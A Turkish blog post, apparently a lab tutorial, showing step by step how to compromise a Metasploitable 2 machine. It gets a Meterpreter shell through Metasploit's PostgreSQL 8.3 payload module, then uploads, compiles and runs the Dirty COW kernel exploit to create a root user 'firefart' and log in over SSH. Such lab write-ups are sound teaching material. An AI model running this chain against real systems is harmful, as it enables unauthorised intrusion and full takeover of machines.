PostgreSQL DB 8.3.0 – 8.3.7

Metasploitable 2.0.0 sürümündeki PostgreSQL DB 8.3.0 – 8.3.7 açığını adım adım giderek exploit edelim :

İlk olarak,

nmap -sSV Target-IP -p- komutunu terminale giriyoruz.

Burada belirlediğim 5432 port numaralı postgresql açığının versiyonunu internet üzerinde aratıyorum.

https://www.rapid7.com/db/modules/exploit/linux/postgres/postgres_payload

Daha sonra msf konsolunu açarak bu adımları sırasıyla uyguluyorum.

not : terminale msfconsole yazarak metasploit framework konsoluna girebiliriz.

exploit deyip meterpretera düştükten sonra shell olup uname -a yazarak sistem hakkındaki bütün bilgiyi göstermesini söylüyorum.

Linux 2.6.24-16-server olarak googleda aratıyoruz.

exploit-db “Dirty COW” 2.6.22 < 3.9 Linux Kernal * a giriş yapıyoruz.

C dilinde yazılmış dirtycow açığından yararlanan kodu karşı hedef bilgisayarımıza göndererek çalıştıracağız.

Buraya siteyi bırakıyorum altında açığı nasıl sömürdüğüne dair açıklaması var, merak ediyorsanız bakabilirsiniz. TIKLA

Kodu indirdiğime göre artık karşı tarafa upload edebilirim.

Kodu meterpreter (shell de iseniz ctrl + c basarak yada exit yazarak dönebilirsiniz.) üzerinden alacağız.

meterpreter > upload /…/…/40839.c

şeklinde upload ettikten sonra shell olacağız.

gcc -pthread 40839.c -o dirty -lcrypt

komutu ile c kodunu dirty ismiyle derliyoruz.

evet dirty.c kodumuz dirty ismiyle çalışmaya hazır hale geldi şimdi ./dirty yazarak sistemde çalıştıralım.

bizden password istedi istediğinizi verebilirsiniz ben saaydmr veriyorum.

Şifreyi verdikten sonra artık kaliye dönüp ssh firefart@<Target-IP> şeklinde bağlanabilirim.

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir